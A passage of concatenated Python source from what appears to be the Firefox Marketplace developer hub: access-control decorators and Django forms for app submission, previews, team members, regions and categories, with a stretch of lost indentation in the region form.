    # Nothing to compare against if the app had no prior rating from
    # this body.
    old_rating = app.content_ratings.filter(ratings_body=ratings_body.id)
    if not old_rating.exists():
        return
    # Only flag on a transition INTO adult, not if it was already adult.
    if rating.adult and not old_rating[0].get_rating().adult:
        RereviewQueue.flag(
            app, amo.LOG.CONTENT_RATING_TO_ADULT,
            message=_('Content rating changed to Adult.'))
########NEW FILE########
__FILENAME__ = decorators
import functools
from django.core.exceptions import ObjectDoesNotExist, PermissionDenied
from amo.decorators import login_required
from access import acl
from addons.decorators import addon_view
def dev_required(owner_for_post=False, allow_editors=False, support=False,
                 webapp=False, skip_submit_check=False, staff=False):
    """Requires user to be add-on owner or admin.

    When allow_editors is True, an editor can view the page.

    When `staff` is True, users in the Staff or Support Staff groups are
    allowed. Users in the Developers group are allowed read-only.

    Usable both as ``@dev_required`` and ``@dev_required(...)`` (see the
    callable() check at the bottom).
    """
    def decorator(f):
        @addon_view
        @login_required
        @functools.wraps(f)
        def wrapper(request, addon, *args, **kw):
            # Imported here to avoid a circular import with the views.
            from mkt.submit.views import _resume
            if webapp:
                kw['webapp'] = addon.is_webapp()
            fun = lambda: f(request, addon_id=addon.id, addon=addon,
                            *args, **kw)
            if allow_editors and acl.check_reviewer(request):
                return fun()
            if staff and (acl.action_allowed(request, 'Apps', 'Configure') or
                          acl.action_allowed(request, 'Apps',
                                             'ViewConfiguration')):
                return fun()
            if support:
                # Let developers and support people do their thangs.
                if (acl.check_addon_ownership(request, addon, support=True) or
                    acl.check_addon_ownership(request, addon, dev=True)):
                    return fun()
            else:
                # Require an owner or dev for POST requests.
                if request.method == 'POST':
                    if acl.check_addon_ownership(request, addon,
                                                 dev=not owner_for_post):
                        return fun()
                # Ignore disabled so they can view their add-on.
                elif acl.check_addon_ownership(request, addon, viewer=True,
                                               ignore_disabled=True):
                    if not skip_submit_check:
                        try:
                            # If it didn't go through the app submission
                            # checklist. Don't die. This will be useful for
                            # creating apps with an API later.
                            step = addon.appsubmissionchecklist.get_next()
                        except ObjectDoesNotExist:
                            step = None
                        # Redirect to the submit flow if they're not done.
                        if not getattr(f, 'submitting', False) and step:
                            return _resume(addon, step)
                    return fun()
            raise PermissionDenied
        return wrapper
    # The arg will be a function if they didn't pass owner_for_post.
    if callable(owner_for_post):
        f = owner_for_post
        owner_for_post = False
        return decorator(f)
    else:
        return decorator
# Mark a view as a web app
def use_apps(f):
    """Decorator that forces ``webapp=True`` into the view's kwargs.

    Fix: now uses functools.wraps (consistent with dev_required above)
    so the wrapped view keeps its name/docstring for URL resolution,
    debugging and introspection.
    """
    @functools.wraps(f)
    def wrapper(request, *args, **kwargs):
        return f(request, *args, webapp=True, **kwargs)
    return wrapper
########NEW FILE########
__FILENAME__ = forms
# -*- coding: utf-8 -*-
import json
import os
from datetime import datetime
from zipfile import ZipFile
from django import forms
from django.conf import settings
from django.core.validators import URLValidator
from django.forms.extras.widgets import SelectDateWidget
from django.forms.models import modelformset_factory
from django.template.defaultfilters import filesizeformat
import commonware
import happyforms
import waffle
from product_details import product_details
from quieter_formset.formset import BaseModelFormSet
from tower import ugettext as _, ugettext_lazy as _lazy, ungettext as ngettext
import addons.forms
import amo
import lib.iarc
from access import acl
from addons.forms import clean_tags, icons, slug_validator
from addons.models import Addon, AddonUser, BlacklistedSlug, Category, Preview
from addons.widgets import CategoriesSelectMultiple, IconWidgetRenderer
from amo import get_user
from amo.fields import SeparatedValuesField
from amo.utils import remove_icons, slugify
from files.models import FileUpload
from files.utils import WebAppParser
from lib.video import tasks as vtasks
from tags.models import Tag
from translations.fields import TransField
from translations.models import Translation
from translations.widgets import TranslationTextarea, TransTextarea
from versions.models import Version
import mkt
from mkt.api.models import Access
from mkt.constants import MAX_PACKAGED_APP_SIZE
from mkt.regions import REGIONS_CHOICES_SORTED_BY_NAME
from mkt.regions.utils import parse_region
from mkt.site.forms import AddonChoiceField
from mkt.webapps.models import IARCInfo, Webapp
from mkt.webapps.tasks import index_webapps
from . import tasks
log = commonware.log.getLogger('mkt.developers')


def region_error(region):
    """Return a ValidationError saying that *region* cannot be selected.

    Converted from a module-level lambda assignment to a ``def`` (PEP 8
    E731): same callable interface, but with a proper name in tracebacks.
    """
    return forms.ValidationError(
        _('You cannot select {region}.').format(
            region=unicode(parse_region(region).name)
        )
    )
def toggle_app_for_special_regions(request, app, enabled_regions=None):
    """Toggle for special regions (e.g., China).

    For each special region, updates the app's geodata status based on
    whether the developer checked that region, then syncs the region
    exclusion row to match the resulting status.
    """
    if not waffle.flag_is_active(request, 'special-regions'):
        return

    for region in mkt.regions.SPECIAL_REGIONS:
        status = app.geodata.get_status(region)

        if enabled_regions is not None:
            if region.id in enabled_regions:
                # If it's not already enabled, mark as pending.
                if status != amo.STATUS_PUBLIC:
                    # Developer requested for it to be in China.
                    status = amo.STATUS_PENDING
                    value, changed = app.geodata.set_status(region, status)
                    if changed:
                        log.info(u'[Webapp:%s] App marked as pending '
                                 u'special region (%s).' % (app, region.slug))
                        value, changed = app.geodata.set_nominated_date(
                            region, save=True)
                        log.info(u'[Webapp:%s] Setting nomination date for to '
                                 u'now for region (%s).' % (app, region.slug))
            else:
                # Developer cancelled request for approval.
                status = amo.STATUS_NULL
                value, changed = app.geodata.set_status(
                    region, status, save=True)
                if changed:
                    log.info(u'[Webapp:%s] App marked as null special '
                             u'region (%s).' % (app, region.slug))

        if status == amo.STATUS_PUBLIC:
            # Reviewer approved for it to be in China.
            # Approved apps must not have an exclusion row.
            aer = app.addonexcludedregion.filter(region=region.id)
            if aer.exists():
                aer.delete()
                log.info(u'[Webapp:%s] App included in new special '
                         u'region (%s).' % (app, region.slug))
        else:
            # Developer requested for it to be in China.
            # Non-public apps stay excluded until approved.
            aer, created = app.addonexcludedregion.get_or_create(
                region=region.id)
            if created:
                log.info(u'[Webapp:%s] App excluded from new special '
                         u'region (%s).' % (app, region.slug))
class AuthorForm(happyforms.ModelForm):
    """Form for one team member (AddonUser) row of an app."""
    # TODO: Remove this whole __init__ when the 'allow-refund' flag goes away.
    def __init__(self, *args, **kwargs):
        super(AuthorForm, self).__init__(*args, **kwargs)
        # Hide the Support role unless refunds are enabled.
        self.fields['role'].choices = (
            (c, s) for c, s in amo.AUTHOR_CHOICES
            if c != amo.AUTHOR_ROLE_SUPPORT or
            waffle.switch_is_active('allow-refund'))

    def clean_user(self):
        user = self.cleaned_data['user']
        # Every listed team member must have accepted the dev agreement.
        if not user.read_dev_agreement:
            raise forms.ValidationError(
                _('All team members must have read and agreed to the '
                  'developer agreement.'))
        return user

    class Meta:
        model = AddonUser
        exclude = ('addon',)
# NOTE: deliberately shadows the imported quieter_formset BaseModelFormSet;
# all formsets below subclass this stricter version.
class BaseModelFormSet(BaseModelFormSet):
    """
    Override the parent's is_valid to prevent deleting all forms.
    """
    def is_valid(self):
        # clean() won't get called in is_valid() if all the rows are getting
        # deleted. We can't allow deleting everything.
        rv = super(BaseModelFormSet, self).is_valid()
        return rv and not any(self.errors) and not bool(self.non_form_errors())
class BaseAuthorFormSet(BaseModelFormSet):
    """Formset-level validation for the team member rows."""
    def clean(self):
        if any(self.errors):
            return
        # cleaned_data could be None if it's the empty extra form.
        data = filter(None, [f.cleaned_data for f in self.forms
                             if not f.cleaned_data.get('DELETE', False)])
        if not any(d['role'] == amo.AUTHOR_ROLE_OWNER for d in data):
            raise forms.ValidationError(_('Must have at least one owner.'))
        if not any(d['listed'] for d in data):
            raise forms.ValidationError(
                _('At least one team member must be listed.'))
        # No duplicate users across rows.
        users = [d['user'] for d in data]
        if sorted(users) != sorted(set(users)):
            raise forms.ValidationError(
                _('A team member can only be listed once.'))
# Formset used on the app ownership page; rows are deletable, no extras.
AuthorFormSet = modelformset_factory(AddonUser, formset=BaseAuthorFormSet,
                                     form=AuthorForm, can_delete=True, extra=0)
class DeleteForm(happyforms.Form):
    """Confirmation form for app deletion; optional free-text reason."""
    reason = forms.CharField(required=False)

    def __init__(self, request):
        # Bound directly to the request's POST data by design.
        super(DeleteForm, self).__init__(request.POST)
def trap_duplicate(request, manifest_url):
    """If this user already has an app with the same manifest URL, return
    an HTML message (with an edit/resume link) describing it; else None.
    """
    # See if this user has any other apps with the same manifest.
    owned = (request.user.addonuser_set
             .filter(addon__manifest_url=manifest_url))
    if not owned:
        return
    try:
        app = owned[0].addon
    except Addon.DoesNotExist:
        return
    error_url = app.get_dev_url()
    # One message per app status; replaces the old six-way elif chain.
    messages_by_status = {
        amo.STATUS_PUBLIC: _(
            u'Oops, looks like you already submitted that manifest '
            'for %s, which is currently public. '
            '<a href="%s">Edit app</a>'),
        amo.STATUS_PENDING: _(
            u'Oops, looks like you already submitted that manifest '
            'for %s, which is currently pending. '
            '<a href="%s">Edit app</a>'),
        amo.STATUS_NULL: _(
            u'Oops, looks like you already submitted that manifest '
            'for %s, which is currently incomplete. '
            '<a href="%s">Resume app</a>'),
        amo.STATUS_REJECTED: _(
            u'Oops, looks like you already submitted that manifest '
            'for %s, which is currently rejected. '
            '<a href="%s">Edit app</a>'),
        amo.STATUS_DISABLED: _(
            u'Oops, looks like you already submitted that manifest '
            'for %s, which is currently disabled by Mozilla. '
            '<a href="%s">Edit app</a>'),
    }
    msg = messages_by_status.get(app.status)
    # As before, the user-disabled message only applies when the status
    # itself did not already match one of the cases above.
    if msg is None and app.disabled_by_user:
        msg = _(u'Oops, looks like you already submitted that manifest '
                'for %s, which is currently disabled. '
                '<a href="%s">Edit app</a>')
    if msg:
        return msg % (app.name, error_url)
def verify_app_domain(manifest_url, exclude=None, packaged=False):
    """Raise ValidationError if another app already lives on this domain.

    The uniqueness check only applies to packaged apps or when the
    'webapps-unique-by-domain' switch is on; *exclude* skips the app
    being edited.
    """
    if not (packaged or waffle.switch_is_active('webapps-unique-by-domain')):
        return
    domain = Webapp.domain_from_url(manifest_url)
    existing = Webapp.objects.filter(app_domain=domain)
    if exclude:
        existing = existing.exclude(pk=exclude.pk)
    if existing.exists():
        raise forms.ValidationError(
            _('An app already exists on this domain; '
              'only one app per domain is allowed.'))
class PreviewForm(happyforms.ModelForm):
    """Form for a single screenshot/video preview of an app."""
    file_upload = forms.FileField(required=False)
    upload_hash = forms.CharField(required=False)
    # This lets us POST the data URIs of the unsaved previews so we can still
    # show them if there were form errors.
    unsaved_image_data = forms.CharField(required=False,
                                         widget=forms.HiddenInput)
    unsaved_image_type = forms.CharField(required=False,
                                         widget=forms.HiddenInput)

    def save(self, addon, commit=True):
        if self.cleaned_data:
            self.instance.addon = addon
            if self.cleaned_data.get('DELETE'):
                # Existing preview.
                if self.instance.id:
                    self.instance.delete()
                # User has no desire to save this preview.
                return

            super(PreviewForm, self).save(commit=commit)
            if self.cleaned_data['upload_hash']:
                upload_hash = self.cleaned_data['upload_hash']
                upload_path = os.path.join(settings.TMP_PATH, 'preview',
                                           upload_hash)
                # The upload hash encodes the mimetype in its extension
                # ('image-png' -> 'image/png').
                filetype = (os.path.splitext(upload_hash)[1][1:]
                            .replace('-', '/'))
                if filetype in amo.VIDEO_TYPES:
                    self.instance.update(filetype=filetype)
                    vtasks.resize_video.delay(upload_path, self.instance,
                                              user=amo.get_user(),
                                              set_modified_on=[self.instance])
                else:
                    self.instance.update(filetype='image/png')
                    tasks.resize_preview.delay(upload_path, self.instance,
                                               set_modified_on=[self.instance])

    class Meta:
        model = Preview
        fields = ('file_upload', 'upload_hash', 'id', 'position')
class JSONField(forms.Field):
    """Form field that decodes JSON strings; non-JSON values pass through."""
    def to_python(self, value):
        if value == '':
            return None
        # Only strings can be decoded; decode failures fall through and
        # return the raw value for later validation to reject.
        if isinstance(value, basestring):
            try:
                return json.loads(value)
            except ValueError:
                pass
        return value
# Multiple-choice field that also accepts a JSON-encoded list of choices.
class JSONMultipleChoiceField(forms.MultipleChoiceField, JSONField):
    widget = forms.CheckboxSelectMultiple
class AdminSettingsForm(PreviewForm):
    """Admin-only app settings: promo image, contacts, flags, tags and
    regional banner message."""
    DELETE = forms.BooleanField(required=False)
    mozilla_contact = SeparatedValuesField(forms.EmailField, separator=',',
                                           required=False)
    vip_app = forms.BooleanField(required=False)
    priority_review = forms.BooleanField(required=False)
    tags = forms.CharField(required=False)
    banner_regions = JSONMultipleChoiceField(
        required=False, choices=mkt.regions.REGIONS_CHOICES_NAME)
    banner_message = TransField(required=False)

    class Meta:
        model = Preview
        fields = ('file_upload', 'upload_hash', 'position')

    def __init__(self, *args, **kw):
        # Get the object for the app's promo `Preview` and pass it to the form.
        if kw.get('instance'):
            addon = kw.pop('instance')
            self.instance = addon
            self.promo = addon.get_promo()
        self.request = kw.pop('request', None)
        # Note: After calling `super`, `self.instance` becomes the `Preview`
        # object.
        super(AdminSettingsForm, self).__init__(*args, **kw)
        self.initial['vip_app'] = addon.vip_app
        self.initial['priority_review'] = addon.priority_review
        if self.instance:
            self.initial['mozilla_contact'] = addon.mozilla_contact
            self.initial['tags'] = ', '.join(self.get_tags(addon))
        self.initial['banner_regions'] = addon.geodata.banner_regions or []
        self.initial['banner_message'] = addon.geodata.banner_message_id

    @property
    def regions_by_id(self):
        return mkt.regions.REGIONS_CHOICES_ID_DICT

    def clean_position(self):
        # The promo preview always sits at position -1.
        return -1

    def clean_banner_regions(self):
        try:
            regions = map(int, self.cleaned_data.get('banner_regions'))
        except (TypeError, ValueError):
            # input data is not a list or data contains non-integers.
            raise forms.ValidationError(_('Invalid region(s) selected.'))
        return list(regions)

    def get_tags(self, addon):
        # Restricted tags are only visible/editable with the Apps:Edit perm.
        if acl.action_allowed(self.request, 'Apps', 'Edit'):
            return list(addon.tags.values_list('tag_text', flat=True))
        else:
            return list(addon.tags.filter(restricted=False)
                        .values_list('tag_text', flat=True))

    def clean_tags(self):
        return clean_tags(self.request, self.cleaned_data['tags'])

    def clean_mozilla_contact(self):
        contact = self.cleaned_data.get('mozilla_contact')
        if self.cleaned_data.get('mozilla_contact') is None:
            return u''
        return contact

    def save(self, addon, commit=True):
        # Promo handling: delete when asked or replaced; save new uploads.
        if (self.cleaned_data.get('DELETE') and
            'upload_hash' not in self.changed_data and self.promo.id):
            self.promo.delete()
        elif self.promo and 'upload_hash' in self.changed_data:
            self.promo.delete()
        elif self.cleaned_data.get('upload_hash'):
            super(AdminSettingsForm, self).save(addon, True)
        contact = self.cleaned_data.get('mozilla_contact')
        updates = {} if contact is None else {'mozilla_contact': contact}
        updates.update({'vip_app': self.cleaned_data.get('vip_app')})
        updates.update({'priority_review':
                        self.cleaned_data.get('priority_review')})
        addon.update(**updates)
        # Diff old vs. new tags and apply only the changes.
        tags_new = self.cleaned_data['tags']
        tags_old = [slugify(t, spaces=True) for t in self.get_tags(addon)]
        add_tags = set(tags_new) - set(tags_old)
        del_tags = set(tags_old) - set(tags_new)
        # Add new tags.
        for t in add_tags:
            Tag(tag_text=t).save_tag(addon)
        # Remove old tags.
        for t in del_tags:
            Tag(tag_text=t).remove_tag(addon)
        geodata = addon.geodata
        geodata.banner_regions = self.cleaned_data.get('banner_regions')
        geodata.banner_message = self.cleaned_data.get('banner_message')
        geodata.save()
        # NOTE(review): no 'flash' field is declared on this form, so
        # cleaned_data.get('flash') is presumably always None here and
        # uses_flash is always set False — confirm whether a field or a
        # subclass is supposed to provide it.
        uses_flash = self.cleaned_data.get('flash')
        af = addon.get_latest_file()
        if af is not None:
            af.update(uses_flash=bool(uses_flash))
        index_webapps.delay([addon.id])
        return addon
class BasePreviewFormSet(BaseModelFormSet):
    """Formset validation: at least one preview must survive the submit."""
    def clean(self):
        if any(self.errors):
            return
        # A row counts when it is neither deleted nor missing its upload.
        has_preview = any(
            not form.cleaned_data.get('DELETE') and
            form.cleaned_data.get('upload_hash') is not None
            for form in self.forms)
        if not has_preview:
            raise forms.ValidationError(
                _('You must upload at least one screenshot or video.'))
# Screenshot/video formset for the media page; one blank extra row.
PreviewFormSet = modelformset_factory(Preview, formset=BasePreviewFormSet,
                                      form=PreviewForm, can_delete=True,
                                      extra=1)
class NewManifestForm(happyforms.Form):
    """Form accepting the manifest URL for a new hosted app."""
    manifest = forms.URLField()

    def __init__(self, *args, **kwargs):
        # is_standalone: used by the standalone validator, which does not
        # enforce domain uniqueness.
        self.is_standalone = kwargs.pop('is_standalone', False)
        super(NewManifestForm, self).__init__(*args, **kwargs)

    def clean_manifest(self):
        manifest = self.cleaned_data['manifest']
        # Skip checking the domain for the standalone validator.
        if not self.is_standalone:
            verify_app_domain(manifest)
        return manifest
class NewPackagedAppForm(happyforms.Form):
    """Form validating a packaged-app zip upload.

    On success (or failure) clean_upload() records a FileUpload whose
    validation JSON carries any errors; the view reads self.file_upload.
    """
    upload = forms.FileField()

    def __init__(self, *args, **kwargs):
        self.max_size = kwargs.pop('max_size', MAX_PACKAGED_APP_SIZE)
        self.user = kwargs.pop('user', get_user())
        self.addon = kwargs.pop('addon', None)
        # Set by clean_upload()/persist_errors().
        self.file_upload = None
        super(NewPackagedAppForm, self).__init__(*args, **kwargs)

    def clean_upload(self):
        upload = self.cleaned_data['upload']
        errors = []

        if upload.size > self.max_size:
            errors.append({
                'type': 'error',
                'message': _('Packaged app too large for submission. Packages '
                             'must be smaller than %s.' % filesizeformat(
                                 self.max_size)),
                'tier': 1,
            })
            # Immediately raise an error, do not process the rest of the view,
            # which would read the file.
            raise self.persist_errors(errors, upload)

        manifest = None
        try:
            # Be careful to keep this as in-memory zip reading.
            manifest = ZipFile(upload, 'r').read('manifest.webapp')
        except Exception:
            # (The exception object was previously bound but unused.)
            errors.append({
                'type': 'error',
                'message': _('Error extracting manifest from zip file.'),
                'tier': 1,
            })

        origin = None
        if manifest:
            try:
                origin = WebAppParser.decode_manifest(manifest).get('origin')
            except forms.ValidationError as e:
                errors.append({
                    'type': 'error',
                    'message': ''.join(e.messages),
                    'tier': 1,
                })

        if origin:
            try:
                verify_app_domain(origin, packaged=True, exclude=self.addon)
            # Fix: was legacy py2 `except X, e:` syntax, inconsistent with
            # the `as e` form used above.
            except forms.ValidationError as e:
                errors.append({
                    'type': 'error',
                    'message': ''.join(e.messages),
                    'tier': 1,
                })

        if errors:
            raise self.persist_errors(errors, upload)

        # Everything passed validation.
        self.file_upload = FileUpload.from_post(
            upload, upload.name, upload.size, is_webapp=True)
        self.file_upload.user = self.user
        self.file_upload.save()

    def persist_errors(self, errors, upload):
        """
        Persist the error with this into FileUpload (but do not persist
        the file contents, which are too large) and return a ValidationError.
        """
        validation = {
            'errors': len(errors),
            'success': False,
            'messages': errors,
        }
        self.file_upload = FileUpload.objects.create(
            is_webapp=True, user=self.user,
            name=getattr(upload, 'name', ''),
            validation=json.dumps(validation))
        # Return a ValidationError to be raised by the view.
        return forms.ValidationError(' '.join(e['message'] for e in errors))
class AppFormBasic(addons.forms.AddonFormBase):
    """Form to edit basic app info."""
    slug = forms.CharField(max_length=30, widget=forms.TextInput)
    manifest_url = forms.URLField()
    description = TransField(required=True,
        label=_lazy(u'Provide a detailed description of your app'),
        help_text=_lazy(u'This description will appear on the details page.'),
        widget=TransTextarea)

    class Meta:
        model = Addon
        fields = ('slug', 'manifest_url', 'description')

    def __init__(self, *args, **kw):
        # Force the form to use app_slug if this is a webapp. We want to keep
        # this under "slug" so all the js continues to work.
        if kw['instance'].is_webapp():
            kw.setdefault('initial', {})['slug'] = kw['instance'].app_slug
        super(AppFormBasic, self).__init__(*args, **kw)
        if self.instance.is_packaged:
            # Manifest URL field for packaged apps is empty.
            self.fields['manifest_url'].required = False

    def _post_clean(self):
        # Switch slug to app_slug in cleaned_data and self._meta.fields so
        # we can update the app_slug field for webapps.
        try:
            self._meta.fields = list(self._meta.fields)
            slug_idx = self._meta.fields.index('slug')
            data = self.cleaned_data
            if 'slug' in data:
                data['app_slug'] = data.pop('slug')
            self._meta.fields[slug_idx] = 'app_slug'
            super(AppFormBasic, self)._post_clean()
        finally:
            # Always restore 'slug' so the class-level Meta isn't corrupted.
            self._meta.fields[slug_idx] = 'slug'

    def clean_slug(self):
        slug = self.cleaned_data['slug']
        slug_validator(slug, lower=False)
        if slug != self.instance.app_slug:
            if Webapp.objects.filter(app_slug=slug).exists():
                raise forms.ValidationError(
                    _('This slug is already in use. Please choose another.'))
            if BlacklistedSlug.blocked(slug):
                raise forms.ValidationError(_('The slug cannot be "%s". '
                                              'Please choose another.' % slug))
        # NOTE(review): uniqueness is checked on the raw slug but the
        # lowercased value is what gets saved — confirm case handling.
        return slug.lower()

    def clean_manifest_url(self):
        manifest_url = self.cleaned_data['manifest_url']
        # Only verify if manifest changed.
        if 'manifest_url' in self.changed_data:
            # Only Admins can edit the manifest_url.
            if not acl.action_allowed(self.request, 'Admin', '%'):
                return self.instance.manifest_url
            verify_app_domain(manifest_url, exclude=self.instance)
        return manifest_url

    def save(self, addon, commit=False):
        # We ignore `commit`, since we need it to be `False` so we can save
        # the ManyToMany fields on our own.
        addonform = super(AppFormBasic, self).save(commit=False)
        addonform.save()
        return addonform
class AppFormDetails(addons.forms.AddonFormBase):
    """Form for the app details page: locale, homepage, privacy policy."""
    default_locale = forms.TypedChoiceField(required=False,
                                            choices=Addon.LOCALES)
    homepage = TransField.adapt(forms.URLField)(required=False)
    privacy_policy = TransField(widget=TransTextarea(), required=True,
        label=_lazy(u"Please specify your app's Privacy Policy"))

    class Meta:
        model = Addon
        fields = ('default_locale', 'homepage', 'privacy_policy')

    def clean(self):
        # Make sure we have the required translations in the new locale.
        required = ['name', 'description']
        data = self.cleaned_data
        if not self.errors and 'default_locale' in self.changed_data:
            fields = dict((k, getattr(self.instance, k + '_id'))
                          for k in required)
            locale = data['default_locale']
            ids = filter(None, fields.values())
            qs = (Translation.objects.filter(locale=locale, id__in=ids,
                                             localized_string__isnull=False)
                  .values_list('id', flat=True))
            # Fields whose translation id is absent from qs have no
            # translation in the new default locale.
            missing = [k for k, v in fields.items() if v not in qs]
            if missing:
                raise forms.ValidationError(
                    _('Before changing your default locale you must have a '
                      'name and description in that locale. '
                      'You are missing %s.') % ', '.join(map(repr, missing)))
        return data
class AppFormMedia(addons.forms.AddonFormBase):
    """Form for the app icon (choose a stock icon or upload one)."""
    icon_type = forms.CharField(required=False,
        widget=forms.RadioSelect(renderer=IconWidgetRenderer, choices=[]))
    icon_upload_hash = forms.CharField(required=False)
    unsaved_icon_data = forms.CharField(required=False,
                                        widget=forms.HiddenInput)

    class Meta:
        model = Addon
        fields = ('icon_upload_hash', 'icon_type')

    def __init__(self, *args, **kwargs):
        super(AppFormMedia, self).__init__(*args, **kwargs)
        # Add icons here so we only read the directory when
        # AppFormMedia is actually being used.
        self.fields['icon_type'].widget.choices = icons()

    def save(self, addon, commit=True):
        if self.cleaned_data['icon_upload_hash']:
            upload_hash = self.cleaned_data['icon_upload_hash']
            upload_path = os.path.join(settings.TMP_PATH, 'icon', upload_hash)
            dirname = addon.get_icon_dir()
            destination = os.path.join(dirname, '%s' % addon.id)
            # Drop old icon files before the async resize writes new ones.
            remove_icons(destination)
            tasks.resize_icon.delay(upload_path, destination,
                                    amo.ADDON_ICON_SIZES,
                                    set_modified_on=[addon])
        return super(AppFormMedia, self).save(commit)
class AppFormSupport(addons.forms.AddonFormBase):
    """Form for app support contact info; email required, URL optional."""
    support_url = TransField.adapt(forms.URLField)(required=False)
    support_email = TransField.adapt(forms.EmailField)()

    class Meta:
        model = Addon
        fields = ('support_email', 'support_url')
class AppAppealForm(happyforms.Form):
    """
    If a developer's app is rejected he can make changes and request
    another review.
    """
    notes = forms.CharField(
        label=_lazy(u'Your comments'),
        required=False, widget=forms.Textarea(attrs={'rows': 2}))

    def __init__(self, *args, **kw):
        self.product = kw.pop('product', None)
        super(AppAppealForm, self).__init__(*args, **kw)

    def save(self):
        version = self.product.versions.latest()
        notes = self.cleaned_data['notes']
        # Record the resubmission, with the comments when provided.
        if notes:
            amo.log(amo.LOG.WEBAPP_RESUBMIT, self.product, version,
                    details={'comments': notes})
        else:
            amo.log(amo.LOG.WEBAPP_RESUBMIT, self.product, version)
        # Mark app and file as pending again.
        self.product.update(status=amo.WEBAPPS_UNREVIEWED_STATUS)
        version.all_files[0].update(status=amo.WEBAPPS_UNREVIEWED_STATUS)
        return version
class RegionForm(forms.Form):
    """Form controlling which regions an app is listed in."""
    regions = forms.MultipleChoiceField(required=False,
        label=_lazy(u'Choose the regions your app will be listed in:'),
        choices=[],  # populated per-request in __init__.
        widget=forms.CheckboxSelectMultiple,
        error_messages={'required':
            _lazy(u'You must select at least one region.')})
    # Regions needing explicit per-region approval (e.g. China).
    special_regions = forms.MultipleChoiceField(required=False,
        choices=[(x.id, x.name) for x in mkt.regions.SPECIAL_REGIONS],
        widget=forms.CheckboxSelectMultiple)
    enable_new_regions = forms.BooleanField(required=False,
        label=_lazy(u'Enable new regions'))
    # 0 = list (almost) everywhere, 1 = developer picks regions.
    restricted = forms.TypedChoiceField(required=False,
        choices=[(0, _lazy('Make my app available in most regions')),
                 (1, _lazy('Choose where my app is made available'))],
        widget=forms.RadioSelect(attrs={'class': 'choices'}),
        initial=0,
        coerce=int)
def __init__(self, *args, **kw):
self.product = kw.pop('product', None)
self.request = kw.pop('request', None)
super(RegionForm, self).__init__(*args, **kw)
self.fields['regions'].choices = REGIONS_CHOICES_SORTED_BY_NAME()
# If we have excluded regions, uncheck those.
# Otherwise, default to everything checked.
self.regions_before = self.product.get_region_ids(restofworld=True)
self.initial = {
'regions': sorted(self.regions_before),
'restricted': int(self.product.geodata.restricted),
'enable_new_regions': self.product.enable_new_regions,
}
# The checkboxes for special regions are
#
# - checked ... if an app has not been requested for approval in
# China or the app has been rejected in China.
#
# - unchecked ... if an app has been requested for approval in
# China or the app has been approved in China.
unchecked_statuses = (amo.STATUS_NULL, amo.STATUS_REJECTED)
for region in self.special_region_objs:
if self.product.geodata.get_status(region) in unchecked_statuses:
# If it's rejected in this region, uncheck its checkbox.
if region.id in self.initial['regions']:
self.initial['regions'].remove(region.id)
elif region.id not in self.initial['regions']:
# If it's pending/public, check its checkbox.
self.initial['regions'].append(region.id)
@property
def regions_by_id(self):
return mkt.regions.REGIONS_CHOICES_ID_DICT
@property
def special_region_objs(self):
return mkt.regions.SPECIAL_REGIONS
@property
def special_region_ids(self):
return mkt.regions.SPECIAL_REGION_IDS
@property
def special_region_statuses(self):
"""Returns the null/pending/public status for each region."""
statuses = {}
for region in self.special_region_objs:
statuses[region.id] = self.product.geodata.get_status_slug(region)
return statuses
@property
def special_region_messages(self):
"""Returns the L10n messages for each region's status."""
return self.product.geodata.get_status_messages()
def is_toggling(self):
if not self.request or not hasattr(self.request, 'POST'):
return False
value = self.request.POST.get('toggle-paid')
return value if value in ('free', 'paid') else False
def _product_is_paid(self):
return (self.product.premium_type in amo.ADDON_PREMIUMS
or self.product.premium_type == amo.ADDON_FREE_INAPP)
def clean_regions(self):
regions = self.cleaned_data['regions']
if not self.is_toggling():
if not regions:
raise forms.ValidationError(
_('You must select at least one region.'))
return regions
def save(self):
# Don't save regions if we are toggling.
if self.is_toggling():
return
regions = [int(x) for x in self.cleaned_data['regions']]
special_regions = [
int(x) for x in self.cleaned_data['special_regions']
]
restricted = int(self.cleaned_data['restricted'] or 0)
if restricted:
before = set(self.regions_before)
after = set(regions)
log.info(u'[Webapp:%s] App mark as restricted.' % self.product)
# Add new region exclusions.
to_add = before - after
for region in to_add:
aer, created = self.product.addonexcludedregion.get_or_create(
region=region)
if created:
log.info(u'[Webapp:%s] Excluded from new region (%s).'
% (self.product, region))
# Remove old region exclusions.
to_remove = after - before
for region in to_remove:
self.product.addonexcludedregion.filter(
region=region).delete()
log.info(u'[Webapp:%s] No longer exluded from region (%s).'
% (self.product, region))
else:
self.product.addonexcludedregion.all().delete()
log.info(u'[Webapp:%s] App mark as unrestricted.' % self.product)
self.product.geodata.update(restricted=restricted)
# Toggle region exclusions/statuses for special regions (e.g., China).
toggle_app_for_special_regions(self.request, self.product,
special_regions)
if self.cleaned_data['enable_new_regions']:
self.product.update(enable_new_regions=True)
log.info(u'[Webapp:%s] will be added to future regions.'
% self.product)
else:
self.product.update(enable_new_regions=False)
log.info(u'[Webapp:%s] will not be added to future regions.'
% self.product)
class CategoryForm(happyforms.Form):
    """Assigns categories to an app, enforcing the MAX_CATEGORIES limit."""
    categories = forms.ModelMultipleChoiceField(
        queryset=Category.objects.filter(type=amo.ADDON_WEBAPP),
        widget=CategoriesSelectMultiple)
    def __init__(self, *args, **kw):
        self.request = kw.pop('request', None)
        self.product = kw.pop('product', None)
        super(CategoryForm, self).__init__(*args, **kw)
        # Remember the app's current category ids so save() can diff.
        self.cats_before = list(
            self.product.categories.values_list('id', flat=True))
        self.initial['categories'] = self.cats_before
    def max_categories(self):
        """Expose the category limit (useful in templates)."""
        return amo.MAX_CATEGORIES
    def clean_categories(self):
        categories = self.cleaned_data['categories']
        limit = amo.MAX_CATEGORIES
        unique_ids = set(categories.values_list('id', flat=True))
        if len(unique_ids) > limit:
            # L10n: {0} is the number of categories.
            raise forms.ValidationError(ngettext(
                'You can have only {0} category.',
                'You can have only {0} categories.',
                limit).format(limit))
        return categories
    def save(self):
        chosen = set(self.cleaned_data['categories']
                     .values_list('id', flat=True))
        previous = set(self.cats_before)
        # Create links for newly-selected categories.
        for cat_id in chosen - previous:
            self.product.addoncategory_set.create(category_id=cat_id)
        # Drop links for deselected categories.
        self.product.addoncategory_set.filter(
            category_id__in=previous - chosen).delete()
        toggle_app_for_special_regions(self.request, self.product)
class DevAgreementForm(happyforms.Form):
    """Records that a developer accepted the developer agreement."""
    read_dev_agreement = forms.BooleanField(label=_lazy(u'Agree'),
                                            widget=forms.HiddenInput)
    def __init__(self, *args, **kwargs):
        # The user/profile object the acceptance is stamped onto.
        self.instance = kwargs.pop('instance')
        super(DevAgreementForm, self).__init__(*args, **kwargs)
    def save(self):
